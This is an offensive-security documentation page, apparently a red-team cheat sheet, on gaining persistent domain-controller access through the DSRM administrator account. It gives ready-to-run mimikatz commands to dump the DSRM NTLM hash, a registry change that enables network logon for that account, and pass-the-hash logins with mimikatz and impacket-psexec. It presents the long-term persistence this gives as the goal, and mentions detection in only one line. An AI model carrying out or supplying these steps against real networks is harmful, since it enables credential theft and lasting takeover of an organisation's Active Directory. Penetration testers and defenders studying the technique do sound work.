Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Every DC has a local DSRM administrator account set during AD DS promotion. Its NTLM hash can be extracted and used to authenticate to the DC.

Get DSRM Password Hash

mimikatz # token::elevate
mimikatz # lsadump::sam
Look for local Administrator account hash.

Enable Network DSRM Login

By default, DSRM account can only log in during DSRM boot mode. Change registry to allow network logon: 
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
ValueBehavior
0Only in DSRM boot (default)
1When AD DS is stopped
2Always (what we want)

Authenticate with DSRM Hash

mimikatz # sekurlsa::pth /domain:DC_HOSTNAME /user:Administrator /ntlm:DSRM_HASH /run:cmd.exe

impacket-psexec -hashes :DSRM_HASH ./Administrator@DC_IP
Use ./ (local) not DOMAIN/ — DSRM is local account.

Notes

  • DSRM password rarely changed → long-term persistence
  • Local account — use .\Administrator or hostname
  • Survives reboots
  • Requires registry change for remote access
  • Detection: monitor DsrmAdminLogonBehavior registry key

Quick Reference

TaskCommand
Get hashmimikatz # lsadump::sam on DC
Enable remoteSet DsrmAdminLogonBehavior = 2
LoginPtH with ./Administrator (local, not domain)